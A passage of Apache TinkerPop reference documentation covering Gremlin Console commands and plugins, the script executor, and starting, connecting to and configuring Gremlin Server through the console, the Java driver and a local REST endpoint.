loaded: tinkerpop.tinkergraph\ngremlin>\n----\n\nNOTE: If the above plugins are not loaded then they will need to be enabled or else certain examples will not work.\nIf using the standard Gremlin Console distribution, then the plugins should be enabled by default. See below for\nmore information on the `:plugin use` command to manually enable plugins. These plugins, with the exception of\n`tinkerpop.tinkergraph`, cannot be removed from the Console as they are a part of the `gremlin-console.jar` itself.\nThese plugins can only be deactivated.\n\nThe Gremlin Console is loaded and ready for commands. Recall that the console hosts the Gremlin-Groovy language.\nPlease review link:http:\/\/groovy.codehaus.org\/[Groovy] for help on Groovy-related constructs. In short, Groovy is a\nsuperset of Java. What works in Java, works in Groovy. However, Groovy provides many shorthands to make it easier\nto interact with the Java API. Moreoever, Gremlin provides many neat shorthands to make it easier to express paths\nthrough a property graph.\n\n[gremlin-groovy]\n----\ni = 'goodbye'\nj = 'self'\ni + \" \" + j\n\"${i} ${j}\"\n----\n\nThe \"toy\" graph provides a way to get started with Gremlin quickly.\n\n[gremlin-groovy]\n----\ng = TinkerFactory.createModern().traversal(standard())\ng.V()\ng.V().values('name')\ng.V().has('name','marko').out('knows').values('name')\n----\n\nTIP: When using Gremlin-Groovy in a Groovy class file, add `static { GremlinLoader.load() }` to the head of the file.\n\nConsole Commands\n~~~~~~~~~~~~~~~~\n\nIn addition to the standard commands of the link:http:\/\/groovy.codehaus.org\/Groovy+Shell[Groovy Shell], Gremlin adds\nsome other useful operations. The following table outlines the most commonly used commands:\n\n[width=\"100%\",cols=\"3,^2,10\",options=\"header\"]\n|=========================================================\n|Command |Alias |Description\n|:help |:? |Displays list of commands and descriptions. When followed by a command name, it will display more specific help on that particular item.\n|:exit |:x |Ends the Console session.\n|import |:i |Import a class into the Console session.\n|:clear |:c |Sometimes the Console can get into a state where the command buffer no longer understands input (e.g. a misplaced `(` or `}`). Use this command to clear that buffer.\n|:load |:l |Load a file or URL into the command buffer for execution.\n|:install |:+ |Imports a maven library and its dependencies into the Console.\n|:uninstall |:- |Removes a maven library and its dependencies. A restart of the console is required for removal to fully take effect.\n|:plugin |:pin |Plugin management functions to list, activate and deactivate available plugins.\n|:remote |:rem |Configures a \"remote\" context where Gremlin or results of Gremlin will be processed via usage of `:submit`.\n|:submit |:> |Submit Gremlin to the currently active context defined by `:remote`.\n|=========================================================\n\nGremlin Console adds a special `max-iteration` preference that can be configured with the standard `:set` command\nfrom the Groovy Shell. Use this setting to control the maximum number of results that the Console will display.\nConsider the following usage:\n\n[gremlin-groovy]\n----\n:set max-iteration 10\n(0..200)\n:set max-iteration 5\n(0..200)\n----\n\nIf this setting is not present, the console will default the maximum to 100 results.\n\nDependencies and Plugin Usage\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nThe Gremlin Console can dynamically load external code libraries and make them available to the user. Furthermore,\nthose dependencies may contain Gremlin plugins which can expand the language, provide useful functions, etc. These\nimportant console features are managed by the `:install` and `:plugin` commands.\n\nThe following Gremlin Console session demonstrates the basics of these features:\n\n[source,groovy]\n----\ngremlin> :plugin list <1>\n==>tinkerpop.server[active]\n==>tinkerpop.gephi\n==>tinkerpop.utilities[active]\n==>tinkerpop.sugar\n==>tinkerpop.tinkergraph[active]\ngremlin> :plugin use tinkerpop.sugar <2>\n==>tinkerpop.sugar activated\ngremlin> :install org.apache.tinkerpop neo4j-gremlin x.y.z <3>\n==>loaded: [org.apache.tinkerpop, neo4j-gremlin, x.y.z]\ngremlin> :plugin list <4>\n==>tinkerpop.server[active]\n==>tinkerpop.gephi\n==>tinkerpop.utilities[active]\n==>tinkerpop.sugar\n==>tinkerpop.tinkergraph[active]\n==>tinkerpop.neo4j\ngremlin> :plugin use tinkerpop.neo4j <5>\n==>tinkerpop.neo4j activated\ngremlin> :plugin list <6>\n==>tinkerpop.server[active]\n==>tinkerpop.gephi\n==>tinkerpop.sugar[active]\n==>tinkerpop.utilities[active]\n==>tinkerpop.neo4j[active]\n==>tinkerpop.tinkergraph[active]\n----\n\n<1> Show a list of \"available\" plugins. The list of \"available\" plugins is determined by the classes available on\nthe Console classpath. Plugins need to be \"active\" for their features to be available.\n<2> To make a plugin \"active\" execute the `:plugin use` command and specify the name of the plugin to enable.\n<3> Sometimes there are external dependencies that would be useful within the Console. To bring those in, execute\n`:install` and specify the Maven coordinates for the dependency.\n<4> Note that there is a \"tinkerpop.neo4j\" plugin available, but it is not yet \"active\".\n<5> Again, to use the \"tinkerpop.neo4j\" plugin, it must be made \"active\" with `:plugin use`.\n<6> Now when the plugin list is displayed, the \"tinkerpop.neo4j\" plugin is displayed as \"active\".\n\nWARNING: Plugins must be compatible with the version of the Gremlin Console (or Gremlin Server) being used. Attempts\nto use incompatible versions cannot be guaranteed to work. Moreover, be prepared for dependency conflicts in\nthird-party plugins, that may only be resolved via manual jar removal from the `ext\/{plugin}` directory.\n\nTIP: It is possible to manage plugin activation and deactivation by manually editing the `ext\/plugins.txt` file which\ncontains the class names of the \"active\" plugins. It is also possible to clear dependencies added by `:install` by\ndeleting them from the `ext` directory.\n\nScript Executor\n~~~~~~~~~~~~~~~\n\nFor automated tasks and batch executions of Gremlin, it can be useful to execute Gremlin scripts from the command\nline. Consider the following file named `gremlin.groovy`:\n\n[source,groovy]\n----\nimport org.apache.tinkerpop.gremlin.tinkergraph.structure.*\ngraph = TinkerFactory.createModern()\ng = graph.traversal()\ng.V().each { println it }\n----\n\nThis script creates the toy graph and then iterates through all its vertices printing each to the system out. Note\nthat under this approach, \"imports\" need to be explicitly defined (except for \"core\" TinkerPop classes). In addition,\nplugins and other dependencies should already be \"installed\" via console commands which cannot be used with this mode\nof execution. To execute this script from the command line, `gremlin.sh` has the `-e` option used as follows:\n\n[source,bash]\n----\n$ bin\/gremlin.sh -e gremlin.groovy\nv[1]\nv[2]\nv[3]\nv[4]\nv[5]\nv[6]\n----\n\nIt is also possible to pass arguments to scripts. Any parameters following the file name specification are treated\nas arguments to the script. They are collected into a list and passed in as a variable called \"args\". The following\nGremlin script is exactly like the previous one, but it makes use of the \"args\" option to filter the vertices printed\nto system out:\n\n[source,groovy]\n----\nimport org.apache.tinkerpop.gremlin.tinkergraph.structure.*\ngraph = TinkerFactory.createModern()\ng = graph.traversal()\ng.V().has('name',args[0]).each { println it }\n----\n\nWhen executed from the command line a parameter can be supplied:\n\n[source,bash]\n----\n$ bin\/gremlin.sh -e gremlin.groovy marko\nv[1]\n$ bin\/gremlin.sh -e gremlin.groovy vadas\nv[2]\n----\n\nNOTE: The `ScriptExecutor` is for Gremlin Groovy scripts only. It is not possible to include Console plugin commands\nsuch as `:remote` or `:>` when using `-e` in these scripts. That does not mean that it is impossible to script such\ncommands, it just means that they need to be scripted manually. For example, instead of trying to use the `:remote`\ncommand, manually construct a <<connecting-via-java,Gremlin Driver>> `Client` and submit scripts from there.\n\n[[gremlin-server]]\nGremlin Server\n--------------\n\nimage:gremlin-server.png[width=400,float=right] Gremlin Server provides a way to remotely execute Gremlin scripts\nagainst one or more `Graph` instances hosted within it. The benefits of using Gremlin Server include:\n\n* Allows any Gremlin Structure-enabled graph to exist as a standalone server, which in turn enables the ability for\nmultiple clients to communicate with the same graph database.\n* Enables execution of ad-hoc queries through remotely submitted Gremlin scripts.\n* Allows for the hosting of Gremlin-based DSLs (Domain Specific Language) that expand the Gremlin language to match\nthe language of the application domain, which will help support common graph use cases such as searching, ranking,\nand recommendation.\n* Provides a method for Non-JVM languages (e.g. Python, Javascript, etc.) to communicate with the TinkerPop stack.\n* Exposes numerous methods for extension and customization to include serialization options, remote commands, etc.\n\nNOTE: Gremlin Server is the replacement for link:http:\/\/rexster.tinkerpop.com[Rexster].\n\nNOTE: Please see the link:http:\/\/tinkerpop.apache.org\/docs\/x.y.z\/dev\/provider\/[Provider Documentation] for information\non how to develop a driver for Gremlin Server.\n\nBy default, communication with Gremlin Server occurs over link:http:\/\/en.wikipedia.org\/wiki\/WebSocket[WebSockets] and\nexposes a custom sub-protocol for interacting with the server.\n\n[[starting-gremlin-server]]\nStarting Gremlin Server\n~~~~~~~~~~~~~~~~~~~~~~~\n\nGremlin Server comes packaged with a script called `bin\/gremlin-server.sh` to get it started (use `gremlin-server.bat`\non Windows):\n\n[source,text]\n----\n$ bin\/gremlin-server.sh conf\/gremlin-server-modern.yaml\n[INFO] GremlinServer -\n \\,,,\/\n (o o)\n-----oOOo-(3)-oOOo-----\n\n[INFO] GremlinServer - Configuring Gremlin Server from conf\/gremlin-server-modern.yaml\n[INFO] MetricManager - Configured Metrics Slf4jReporter configured with interval=180000ms and loggerName=org.apache.tinkerpop.gremlin.server.Settings$Slf4jReporterMetrics\n[INFO] Graphs - Graph [graph] was successfully configured via [conf\/tinkergraph-empty.properties].\n[INFO] ServerGremlinExecutor - Initialized Gremlin thread pool. Threads in pool named with pattern gremlin-*\n[INFO] ScriptEngines - Loaded gremlin-groovy ScriptEngine\n[INFO] GremlinExecutor - Initialized gremlin-groovy ScriptEngine with scripts\/generate-modern.groovy\n[INFO] ServerGremlinExecutor - Initialized GremlinExecutor and configured ScriptEngines.\n[INFO] ServerGremlinExecutor - A GraphTraversalSource is now bound to [g] with graphtraversalsource[tinkergraph[vertices:0 edges:0], standard]\n[INFO] OpLoader - Adding the standard OpProcessor.\n[INFO] OpLoader - Adding the control OpProcessor.\n[INFO] OpLoader - Adding the session OpProcessor.\n[INFO] GremlinServer - Executing start up LifeCycleHook\n[INFO] Logger$info - Loading 'modern' graph data.\n[INFO] AbstractChannelizer - Configured application\/vnd.gremlin-v1.0+gryo with org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV1d0\n[INFO] AbstractChannelizer - Configured application\/vnd.gremlin-v1.0+gryo-stringd with org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerV1d0\n[INFO] GremlinServer$1 - Gremlin Server configured with worker thread pool of 1, gremlin pool of 8 and boss thread pool of 1.\n[INFO] GremlinServer$1 - Channel started at port 8182.\n----\n\nGremlin Server is configured by the provided link:http:\/\/www.yaml.org\/[YAML] file `conf\/gremlin-server-modern.yaml`.\nThat file tells Gremlin Server many things such as:\n\n* The host and port to serve on\n* Thread pool sizes\n* Where to report metrics gathered by the server\n* The serializers to make available\n* The Gremlin `ScriptEngine` instances to expose and external dependencies to inject into them\n* `Graph` instances to expose\n\nThe log messages that printed above show a number of things, but most importantly, there is a `Graph` instance named\n`graph` that is exposed in Gremlin Server. This graph is an in-memory TinkerGraph and was empty at the start of the\nserver. An initialization script at `scripts\/generate-modern.groovy` was executed during startup. It's contents are\nas follows:\n\n[source,groovy]\n----\ninclude::{basedir}\/gremlin-server\/scripts\/generate-modern.groovy[]\n----\n\nThe script above initializes a `Map` and assigns two key\/values to it. The first, assigned to \"hook\", defines a\n`LifeCycleHook` for Gremlin Server. The \"hook\" provides a way to tie script code into the Gremlin Server startup and\nshutdown sequences. The `LifeCycleHook` has two methods that can be implemented: `onStartUp` and `onShutDown`.\nThese events are called once at Gremlin Server start and once at Gremlin Server stop. This is an important point\nbecause code outside of the \"hook\" is executed for each `ScriptEngine` creation (multiple may be created when\n\"sessions\" are enabled) and therefore the `LifeCycleHook` provides a way to ensure that a script is only executed a\nsingle time. In this case, the startup hook loads the \"modern\" graph into the empty TinkerGraph instance, preparing\nit for use. The second key\/value pair assigned to the `Map`, named \"g\", defines a `TraversalSource` from the `Graph`\nbound to the \"graph\" variable in the YAML configuration file. This variable `g`, as well as any other variable\nassigned to the `Map`, will be made available as variables for future remote script executions. In more general\nterms, any key\/value pairs assigned to a `Map` returned from the initialization script will become variables that\nare global to all requests. In addition, any functions that are defined will be cached for future use.\n\nWARNING: Transactions on graphs in initialization scripts are not closed automatically after the script finishes\nexecuting. It is up to the script to properly commit or rollback transactions in the script itself.\n\n[[connecting-via-console]]\nConnecting via Console\n~~~~~~~~~~~~~~~~~~~~~~\n\nWith Gremlin Server running it is now possible to issue some scripts to it for processing. Start Gremlin Console as\nfollows:\n\n[source,text]\n----\n$ bin\/gremlin.sh\n\n \\,,,\/\n (o o)\n-----oOOo-(3)-oOOo-----\ngremlin>\n----\n\nThe console has the notion of a \"remote\", which represents a place a script will be sent from the console to be\nevaluated elsewhere in some other context (e.g. Gremlin Server, Hadoop, etc.). To create a remote in the console,\ndo the following:\n\n[gremlin-groovy]\n----\n:remote connect tinkerpop.server conf\/remote.yaml\n----\n\nThe `:remote` command shown above displays the current status of the remote connection. This command can also be\nused to configure a new connection and change other related settings. To actually send a script to the server a\ndifferent command is required:\n\n[gremlin-groovy]\n----\n:> g.V().values('name')\n:> g.V().has('name','marko').out('created').values('name')\n:> g.E().label().groupCount()\nresult\n:remote close\n----\n\nThe `:>` command, which is a shorthand for `:submit`, sends the script to the server to execute there. Results are\nwrapped in an `Result` object which is a just a holder for each individual result. The `class` shows the data type\nfor the containing value. Note that the last script sent was supposed to return a `Map`, but its `class` is\n`java.lang.String`. By default, the connection is configured to only return text results. In other words,\nGremlin Server is using `toString` to serialize all results back to the console. This enables virtually any\nobject on the server to be returned to the console, but it doesn't allow the opportunity to work with this data\nin any way in the console itself. A different configuration of the `:remote` is required to get the results back\nas \"objects\":\n\n[gremlin-groovy]\n----\n:remote connect tinkerpop.server conf\/remote-objects.yaml <1>\n:remote list <2>\n:> g.E().label().groupCount() <3>\nm = result[0].object <4>\nm.sort {it.value}\nscript = \"\"\"\n matthias = graph.addVertex('name','matthias')\n matthias.addEdge('co-creator',g.V().has('name','marko').next())\n \"\"\"\n:> @script <5>\n:> g.V().has('name','matthias').out('co-creator').values('name')\n:remote close\n----\n\n<1> This configuration file specifies that results should be deserialized back into an `Object` in the console with\nthe caveat being that the server and console both know how to serialize and deserialize the result to be returned.\n<2> There are now two configured remote connections. The one marked by an asterisk is the one that was just created\nand denotes the current one that `:sumbit` will react to.\n<3> When the script is executed again, the `class` is no longer shown to be a `java.lang.String`. It is instead a `java.util.HashMap`.\n<4> The last result of a remote script is always stored in the reserved variable `result`, which allows access to\nthe `Result` and by virtue of that, the `Map` itself.\n<5> If the submission requires multiple-lines to express, then a multi-line string can be created. The `:>` command\nrealizes that the user is referencing a variable via `@` and submits the string script.\n\nTIP: In Groovy, `\"\"\" text \"\"\"` is a convenient way to create a multi-line string and works well in concert with\n`:> @variable`. Note that this model of submitting a string variable works for all `:>` based plugins, not just Gremlin Server.\n\nWARNING: Not all values that can be returned from a Gremlin script end up being serializable. For example,\nsubmitting `:> graph` will return a `Graph` instance and in most cases those are not serializable by Gremlin Server\nand will return a serialization error. It should be noted that `TinkerGraph`, as a convenience for shipping around\nsmall sub-graphs, is serializable from Gremlin Server.\n\nThe Gremlin Server `:remote config` command for the driver has the following configuration options:\n\n[width=\"100%\",cols=\"3,10a\",options=\"header\"]\n|=========================================================\n|Command |Description\n|alias |\n[width=\"100%\",cols=\"3,10\",options=\"header\"]\n!=========================================================\n!Option !Description\n! _pairs_ !A set of key\/value alias\/binding pairs to apply to requests.\n!`reset` !Clears any aliases that were supplied in previous configurations of the remote.\n!`show` !Shows the current set of aliases which is returned as a `Map`\n!=========================================================\n|timeout |Specifies the length of time in milliseconds a will wait for a response from the server. Specify \"none\" to\nhave no timeout. By default, this setting uses \"none\".\n|=========================================================\n\n[[console-aliases]]\nAliases\n^^^^^^^\n\nThe `alias` configuration command for the Gremlin Server `:remote` can be useful in situations where there are\nmultiple `Graph` or `TraversalSource` instances on the server, as it becomes possible to rename them from the client\nfor purposes of execution within the context of a script. Therefore, it becomes possible to submit commands this way:\n\n[gremlin-groovy]\n----\n:remote connect tinkerpop.server conf\/remote-objects.yaml\n:remote config alias x g\n:> x.E().label().groupCount()\n----\n\n[[console-sessions]]\nSessions\n^^^^^^^^\n\nA `:remote` created in the following fashion will be \"sessionless\", meaning each script issued to the server with\n`:>` will be encased in a transaction and no state will be maintained from one request to the next.\n\n[gremlin-groovy]\n----\n:remote connect tinkerpop.server conf\/remote-objects.yaml\n----\n\nIn other words, the transaction will be automatically committed (or rolledback on error) and any variables declared\nin that script will be forgotten for the next request. See the section on <<sessions, \"Considering Sessions\">>\nfor more information on that topic.\n\nTo enable the remote to connect with a session the `connect` argument takes another argument as follows:\n\n[gremlin-groovy]\n----\n:remote connect tinkerpop.server conf\/remote.yaml session\n:> x = 1\n:> y = 2\n:> x + y\n----\n\nWith the above command a session gets created with a random UUID for a session identifier. It is also possible to\nassign a custom session identifier by adding it as the last argument to `:remote` command above. There is also the\noption to replace \"session\" with \"session-managed\" to create a session that will auto-manage transactions (i.e. each\nrequest will occur within the bounds of a transaction). In this way, the state of bound variables between requests are\nmaintained, but the need to manually managed the transactional scope of the graph is no longer required.\n\n[[console-remote-console]]\nRemote Console\n^^^^^^^^^^^^^^\n\nPrevious examples have shown usage of the `:>` command to send scripts to Gremlin Server. The Gremlin Console also\nsupports an additional method for doing this which can be more convenient when the intention is to exclusively\nwork with a remote connection to the server.\n\n[gremlin-groovy]\n----\n:remote connect tinkerpop.server conf\/remote.yaml session\n:remote console\nx = 1\ny = 2\nx + y\n:remote console\n----\n\nIn the above example, the `:remote console` command is executed. It places the console in a state where the `:>` is\nno longer required. Each script line is actually automatically submitted to Gremlin Server for evalaution. The\nvariables `x` and `y` that were defined actually don't exist locally - they only exist on the server! In this sense,\nputting the console in this mode is basically like creating a window to a session on Gremlin Server.\n\nTIP: When using `:remote console` there is not much point to using a configuration that uses a serializer that returns\nactual data. In other words, using a configuration like the one inside of `conf\/remote-objects.yaml` isn't typically\nuseful as in this mode the result will only ever be displayed but not used. Using a serializer configuration like\nthe one in `conf\/remote.yaml` should perform better.\n\nNOTE: Console commands, those that begin with a colon (e.g. `:x`, `:remote`) do not execute remotely when in this mode.\nThey are all still evaluated locally.\n\n[[connecting-via-java]]\nConnecting via Java\n~~~~~~~~~~~~~~~~~~~\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.tinkerpop<\/groupId>\n <artifactId>gremlin-driver<\/artifactId>\n <version>x.y.z<\/version>\n<\/dependency>\n----\n\nimage:gremlin-java.png[width=175,float=left] TinkerPop3 comes equipped with a reference client for Java-based\napplications. It is referred to as Gremlin Driver, which enables applications to send requests to Gremlin Server\nand get back results.\n\nGremlin code is sent to the server from a `Client` instance. A `Client` is created as follows:\n\n[source,java]\n----\nCluster cluster = Cluster.open(); <1>\nClient client = cluster.connect(); <2>\n----\n\n<1> Opens a reference to `localhost` - note that there are many configuration options available in defining a `Cluster` object.\n<2> Creates a `Client` given the configuration options of the `Cluster`.\n\nOnce a `Client` instance is ready, it is possible to issue some Gremlin:\n\n[source,java]\n----\nResultSet results = client.submit(\"[1,2,3,4]\"); <1>\nresults.stream().map(i -> i.get(Integer.class) * 2); <2>\n\nCompletableFuture<List<Result>> results = client.submit(\"[1,2,3,4]\").all(); <3>\n\nCompletableFuture<ResultSet> future = client.submitAsync(\"[1,2,3,4]\"); <4>\n\nMap<String,Object> params = new HashMap<>();\nparams.put(\"x\",4);\nclient.submit(\"[1,2,3,x]\", params); <5>\n----\n\n<1> Submits a script that simply returns a `List` of integers. This method blocks until the request is written to\nthe server and a `ResultSet` is constructed.\n<2> Even though the `ResultSet` is constructed, it does not mean that the server has sent back the results (or even\nevaluated the script potentially). The `ResultSet` is just a holder that is awaiting the results from the server.\nIn this case, they are streamed from the server as they arrive.\n<3> Submit a script, get a `ResultSet`, then return a `CompletableFuture` that will be called when all results have been returned.\n<4> Submit a script asynchronously without waiting for the request to be written to the server.\n<5> Parameterized request are considered the most efficient way to send Gremlin to the server as they can be cached,\nwhich will boost performance and reduce resources required on the server.\n\nConfiguration\n^^^^^^^^^^^^^\n\nThe following table describes the various configuration options for the Gremlin Driver:\n\n[width=\"100%\",cols=\"3,10,^2\",options=\"header\"]\n|=========================================================\n|Key |Description |Default\n|connectionPool.channelizer |The fully qualified classname of the client `Channelizer` that defines how to connect to the server. |`Channelizer.WebSocketChannelizer`\n|connectionPool.enableSsl |Determines if SSL should be enabled or not. If enabled on the server then it must be enabled on the client. |false\n|connectionPool.keyCertChainFile |The X.509 certificate chain file in PEM format. |_none_\n|connectionPool.keyFile |The `PKCS#8` private key file in PEM format. |_none_\n|connectionPool.keyPassword |The password of the `keyFile` if it's not password-protected |_none_\n|connectionPool.maxContentLength |The maximum length in bytes that a message can be sent to the server. This number can be no greater than the setting of the same name in the server configuration. |65536\n|connectionPool.maxInProcessPerConnection |The maximum number of in-flight requests that can occur on a connection. |4\n|connectionPool.maxSimultaneousUsagePerConnection |The maximum number of times that a connection can be borrowed from the pool simultaneously. |16\n|connectionPool.maxSize |The maximum size of a connection pool for a host. |8\n|connectionPool.maxWaitForConnection |The amount of time in milliseconds to wait for a new connection before timing out. |3000\n|connectionPool.maxWaitForSessionClose |The amount of time in milliseconds to wait for a session to close before timing out (does not apply to sessionless connections). |3000\n|connectionPool.minInProcessPerConnection |The minimum number of in-flight requests that can occur on a connection. |1\n|connectionPool.minSimultaneousUsagePerConnection |The maximum number of times that a connection can be borrowed from the pool simultaneously. |8\n|connectionPool.minSize |The minimum size of a connection pool for a host. |2\n|connectionPool.reconnectInitialDelay |The amount of time in milliseconds to wait before trying to reconnect to a dead host for the first time. |1000\n|connectionPool.reconnectInterval |The amount of time in milliseconds to wait before trying to reconnect to a dead host. This interval occurs after the time specified by the `reconnectInitialDelay`. |1000\n|connectionPool.resultIterationBatchSize |The override value for the size of the result batches to be returned from the server. |64\n|connectionPool.trustCertChainFile |File location for a SSL Certificate Chain to use when SSL is enabled. If this value is not provided and SSL is enabled, the `TrustManager` will be established with a self-signed certificate which is NOT suitable for production purposes. |_none_\n|hosts |The list of hosts that the driver will connect to. |localhost\n|jaasEntry |Sets the `AuthProperties.Property.JAAS_ENTRY` properties for authentication to Gremlin Server. |_none_\n|nioPoolSize |Size of the pool for handling request\/response operations. |available processors\n|password |The password to submit on requests that require authentication. |_none_\n|port |The port of the Gremlin Server to connect to. The same port will be applied for all hosts. |8192\n|protocol |Sets the `AuthProperties.Property.PROTOCOL` properties for authentication to Gremlin Server. |_none_\n|serializer.className |The fully qualified class name of the `MessageSerializer` that will be used to communicate with the server. Note that the serializer configured on the client should be supported by the server configuration. |`GryoMessageSerializerV1d0`\n|serializer.config |A `Map` of configuration settings for the serializer. |_none_\n|username |The username to submit on requests that require authentication. |_none_\n|workerPoolSize |Size of the pool for handling background work. |available processors * 2\n|=========================================================\n\nPlease see the link:http:\/\/tinkerpop.apache.org\/javadocs\/x.y.z\/core\/org\/apache\/tinkerpop\/gremlin\/driver\/Cluster.Builder.html[Cluster.Builder javadoc] to get more information on these settings.\n\nAliases\n^^^^^^^\n\nScripts submitted to Gremlin Server automatically have the globally configured `Graph` and `TraversalSource` instances\nmade available to them. Therefore, if Gremlin Server configures two `TraversalSource` instances called \"g1\" and \"g2\"\na script can simply reference them directly as:\n\n[source,java]\nclient.submit(\"g1.V()\")\nclient.submit(\"g2.V()\")\n\nWhile this is an acceptable way to submit scripts, it has the downside of forcing the client to encode the server-side\nvariable name directly into the script being sent. If the server configuration ever changed such that \"g1\" became\n\"g100\", the client-side code might have to see a significant amount of change. Decoupling the script code from the\nserver configuration can be managed by the `alias` method on `Client` as follows:\n\n[source,java]\nClient g1Client = client.alias(\"g1\")\nClient g2Client = client.alias(\"g2\")\ng1Client.submit(\"g.V()\")\ng2Client.submit(\"g.V()\")\n\nThe above code demonstrates how the `alias` method can be used such that the script need only contain a reference\nto \"g\" and \"g1\" and \"g2\" are automatically rebound into \"g\" on the server-side.\n\nSerialization\n^^^^^^^^^^^^^\n\nWhen using Gryo serialization (the default serializer for the driver), it is important that the client and server\nhave the same serializers configured or else one or the other will experience serialization exceptions and fail to\nalways communicate. Discrepancy in serializer registration between client and server can happen fairly easily as\ngraphs will automatically include serializers on the server-side, thus leaving the client to be configured manually.\nThis can be done manually as follows:\n\n[source,java]\nGryoMapper kryo = GryoMapper.build().addRegistry(TitanIoRegistry.INSTANCE).create();\nMessageSerializer serializer = new GryoMessageSerializerV1d0(kryo);\nCluster cluster = Cluster.build()\n .serializer(serializer)\n .create();\nClient client = cluster.connect().init();\n\nThe above code demonstrates using the `TitanIoRegistry` which is an `IoRegistry` instance. It tells the serializer\nwhat classes (from Titan in this case) to auto-register during serialization. Gremlin Server roughly uses this same\napproach when it configures it's serializers, so using this same model will ensure compatibility when making requests.\n\nConnecting via REST\n~~~~~~~~~~~~~~~~~~~\n\nimage:gremlin-rexster.png[width=225,float=left] While the default behavior for Gremlin Server is to provide a\nWebSockets-based connection, it can also be configured to support link:http:\/\/en.wikipedia.org\/wiki\/Representational_state_transfer[REST].\nThe REST endpoint provides for a communication protocol familiar to most developers, with a wide support of\nprogramming languages, tools and libraries for accessing it. As a result, REST provides a fast way to get started\nwith Gremlin Server. It also may represent an easier upgrade path from link:http:\/\/rexster.tinkerpop.com\/[Rexster]\nas the API for the endpoint is very similar to Rexster's link:https:\/\/github.com\/tinkerpop\/rexster\/wiki\/Gremlin-Extension[Gremlin Extension].\n\nGremlin Server provides for a single REST endpoint - a Gremlin evaluator - which allows the submission of a Gremlin\nscript as a request. For each request, it returns a response containing the serialized results of that script.\nTo enable this endpoint, Gremlin Server needs to be configured with the `HttpChannelizer`, which replaces the default\n`WebSocketChannelizer`, in the configuration file:\n\n[source,yaml]\nchannelizer: org.apache.tinkerpop.gremlin.server.channel.HttpChannelizer\n\nThis setting is already configured in the `gremlin-server-rest-modern.yaml` file that is packaged with the Gremlin\nServer distribution. To utilize it, start Gremlin Server as follows:\n\n[source,text]\nbin\/gremlin-server.sh conf\/gremlin-server-rest-modern.yaml\n\nOnce the server has started, issue a request. Here's an example with link:http:\/\/curl.haxx.se\/[cURL]:\n\n[source,text]\n$ curl \"http:\/\/localhost:8182?gremlin=100-1\"\n\nwhich returns:\n\n[source,js]\n{\n \"result\":{\"data\":99,\"meta\":{}},\n \"requestId\":\"0581cdba-b152-45c4-80fa-3d36a6eecf1c\",\n \"status\":{\"code\":200,\"attributes\":{},\"message\":\"\"}\n}\n\nThe above example showed a `GET` operation, but the preferred method for this endpoint is `POST`:\n\n[source,text]\ncurl -X POST -d \"{\\\"gremlin\\\":\\\"100-1\\\"}\" \"http:\/\/localhost:8182\"\n\nwhich returns:\n\n[source,js]\n{\n \"result\":{\"data\":99,\"meta\":{}},\n \"requestId\":\"ef2fe16c-441d-4e13-9ddb-3c7b5dfb10ba\",\n \"status\":{\"code\":200,\"attributes\":{},\"message\":\"\"}\n}\n\nIt is also preferred that Gremlin scripts be parameterized when possible via `bindings`:\n\n[source,text]\ncurl -X POST -d \"{\\\"gremlin\\\":\\\"100-x\\\", \\\"bindings\\\":{\\\"x\\\":1}}\" \"http:\/\/localhost:8182\"\n\nThe `bindings` argument is a `Map` of variables where the keys become available as variables in the Gremlin script.\nNote that parameterization of requests is critical to performance, as repeated script compilation can be avoided on\neach request.\n\nNOTE: It is possible to pass bindings via `GET` based requests. Query string arguments prefixed with \"bindings.\" will\nbe treated as parameters, where that prefix will be removed and the value following the period will become the\nparameter name. In other words, `bindings.x` will create a parameter named \"x\" that can be referenced in the submitted\nGremlin script. The caveat is that these arguments will always be treated as `String` values. To ensure that data\ntypes are preserved or to pass complex objects such as lists or maps, use `POST` which will at least support the\nallowed JSON data types.\n\nFinally, as Gremlin Server can host multiple `ScriptEngine` instances (e.g. `gremlin-groovy`, `nashorn`), it is\npossible to define the language to utilize to process the request:\n\n[source,text]\ncurl -X POST -d \"{\\\"gremlin\\\":\\\"100-x\\\", \\\"language\\\":\\\"gremlin-groovy\\\", \\\"bindings\\\":{\\\"x\\\":1}}\" \"http:\/\/localhost:8182\"\n\nBy default this value is set to `gremlin-groovy`. If using a `GET` operation, this value can be set as a query\nstring argument with by setting the `language` key.\n\nWARNING: Consider the size of the result of a submitted script being returned from the REST endpoint. A script\nthat iterates thousands of results will serialize each of those in memory into a single JSON result set. It is\nquite possible that such a script will generate `OutOfMemoryError` exceptions on the server. Consider the default\nWebSockets configuration, which supports streaming, if that type of use case is required.\n\nConfiguring\n~~~~~~~~~~~\n\nAs mentioned earlier, Gremlin Server is configured though a YAML file. By default, Gremlin Server will look for a\nfile called `conf\/gremlin-server.yaml` to configure itself on startup. To override this default, supply the file\nto use to `bin\/gremlin-server.sh` as in:\n\n[source,text]\n----\nbin\/gremlin-server.sh conf\/gremlin-server-min.yaml\n----\n\nThe `gremlin-server.sh` file also serves a second purpose. It can be used to \"install\" dependencies to the Gremlin\nServer path. For example, to be able to configure and use other `Graph` implementations, the dependencies must be\nmade available to Gremlin Server. To do this, use the `-i` switch and supply the Maven coordinates for the dependency\nto \"install\". For example, to use Neo4j in Gremlin Server:\n\n[source,text]\n----\nbin\/gremlin-server.sh -i org.apache.tinkerpop neo4j-gremlin x.y.z\n----\n\nThis command will \"grab\" the appropriate dependencies and copy them to the `ext` directory of Gremlin Server, which\nwill then allow them to be \"used\" the next time the server is started. To uninstall dependencies, simply delete them\nfrom the `ext` directory.\n\nThe following table describes the various configuration options that Gremlin Server expects:\n\n[width=\"100%\",cols=\"3,10,^2\",options=\"header\"]\n|=========================================================\n|Key |Description |Default\n|authentication.className |The fully qualified classname of an `Authenticator` implementation to use. If this setting is not present, then authentication is effectively disabled. |`AllowAllAuthenticator`\n|authentication.config |A `Map` of configuration settings to be passes to the `Authenticator` when it is constructed. The settings available are dependent on the implementation. |_none_\n|channelizer |The fully qualified classname of the `Channelizer` implementation to use. A `Channelizer` is a \"channel initializer\" which Gremlin Server uses to define the type of processing pipeline to use. By allowing different `Channelizer` implementations, Gremlin Server can support different communication protocols (e.g. Websockets, Java NIO, etc.). |`WebSocketChannelizer`\n|graphs |A `Map` of `Graph` configuration files where the key of the `Map` becomes the name to which the `Graph` will be bound and the value is the file name of a `Graph` configuration file. |_none_\n|gremlinPool |The number of \"Gremlin\" threads available to execute actual scripts in a 